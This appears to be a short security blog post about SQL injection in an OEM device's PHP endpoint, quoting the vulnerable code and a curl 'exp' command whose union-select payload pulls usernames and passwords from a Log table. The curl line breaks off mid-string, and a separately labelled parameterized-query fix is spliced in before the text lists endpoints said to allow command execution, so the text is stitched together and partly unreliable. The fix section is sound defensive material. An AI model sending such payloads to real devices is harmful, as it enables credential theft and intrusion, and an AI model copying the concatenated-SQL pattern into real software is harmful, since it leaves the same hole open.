
From injection to arbitrary command execution in an OEM product

[2017.12.26]


A known injection point:
<?php
    // Both parameters are taken straight from the POST body, without validation.
    $CountryCode = $_POST['CountryCode'];
    $ChannelType = $_POST['ChannelType'];
    $DBNAME = "sqlite:/icac/db/icac_cfg/icac_cfg.db";
    $dbh = new PDO($DBNAME);
    // The raw values are concatenated into the SQL text: a single quote in either
    // parameter ends the string literal and the rest of the input becomes SQL.
    $sql = "select ChannelValue from CCAndChannelRelations where CountryCode = '".$CountryCode."' and ChannelType = '".$ChannelType."'";
    $stmt = $dbh->query($sql);
    $result = $stmt->fetchAll();
    $stmt = null;
    $dbh = null;
    // Whatever the query returned is echoed back, so injected results are visible to the caller.
    echo json_encode($result);
?>


exp:

curl 'https://xxxxxxxxxxx/apgroup/getChannelByCountryCode.php' -d "CountryCode=' union select UserName || '|'  || PassWord from Log
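The fix for this class of bug is to stop building the query from strings. The following is an added example, not the vendor's code: the same lookup rewritten with a PDO prepared statement and named placeholders, plus an allow-list check on CountryCode in front of it. It assumes the table and column names shown on the page, assumes that a country code is two upper-case letters (an assumed format used only for the allow-list), and uses a constructed in-memory SQLite database with sample rows so it runs offline; the real handler would open sqlite:/icac/db/icac_cfg/icac_cfg.db instead.

```php
<?php
// Added example (not the vendor's code): parameterized version of the
// getChannelByCountryCode.php lookup shown on the page.

function getChannelByCountryCode(PDO $dbh, string $countryCode, string $channelType): array
{
    // The SQL text is fixed. The inputs travel as bound values, so a quote or
    // a "union select" inside them is data for the comparison, never SQL.
    $sql = 'select ChannelValue from CCAndChannelRelations'
         . ' where CountryCode = :cc and ChannelType = :ct';
    $stmt = $dbh->prepare($sql);
    $stmt->bindValue(':cc', $countryCode, PDO::PARAM_STR);
    $stmt->bindValue(':ct', $channelType, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function isValidCountryCode(string $cc): bool
{
    // Assumed format for a country code: exactly two upper-case letters.
    // This rejects quotes, spaces and SQL keywords before the database is touched.
    return preg_match('/^[A-Z]{2}$/', $cc) === 1;
}

function handleRequest(PDO $dbh, array $post): string
{
    $countryCode = (string)($post['CountryCode'] ?? '');
    $channelType = (string)($post['ChannelType'] ?? '');
    if (!isValidCountryCode($countryCode)) {
        http_response_code(400);
        return json_encode(['error' => 'invalid CountryCode']);
    }
    return json_encode(getChannelByCountryCode($dbh, $countryCode, $channelType));
}

function openDemoDb(): PDO
{
    // Constructed in-memory database with sample rows so the example runs offline.
    $dbh = new PDO('sqlite::memory:');
    $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $dbh->exec('create table CCAndChannelRelations (CountryCode text, ChannelType text, ChannelValue text)');
    $dbh->exec("insert into CCAndChannelRelations values ('CN', '2.4G', '1-13')");
    $dbh->exec('create table Log (UserName text, PassWord text)');
    $dbh->exec("insert into Log values ('admin', 'sample-password')");
    return $dbh;
}

$dbh = openDemoDb();

// A normal request returns the configured channel value.
echo handleRequest($dbh, ['CountryCode' => 'CN', 'ChannelType' => '2.4G']), PHP_EOL;

// The page's payload as CountryCode: the allow-list rejects it with a 400.
$payload = "' union select UserName || '|' || PassWord from Log";
echo handleRequest($dbh, ['CountryCode' => $payload, 'ChannelType' => '2.4G']), PHP_EOL;

// Even without the allow-list, the bound value simply matches no row, so the
// Log table is never read: the prepared statement alone closes the injection.
echo json_encode(getChannelByCountryCode($dbh, $payload, '2.4G')), PHP_EOL;
```

The allow-list is defence in depth, not the fix itself: the prepared statement is what makes the query structure independent of the input. The two calls at the end show the difference, one with the whole handler and one with only the parameterized query.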

After that, three arbitrary command execution points were found:

/ap/ap_wireless_info.php



/ap/ap_other_info.php



北京通和实益电信科学技术研究所有限公司, all rights reserved. 京ICP备15030238号-1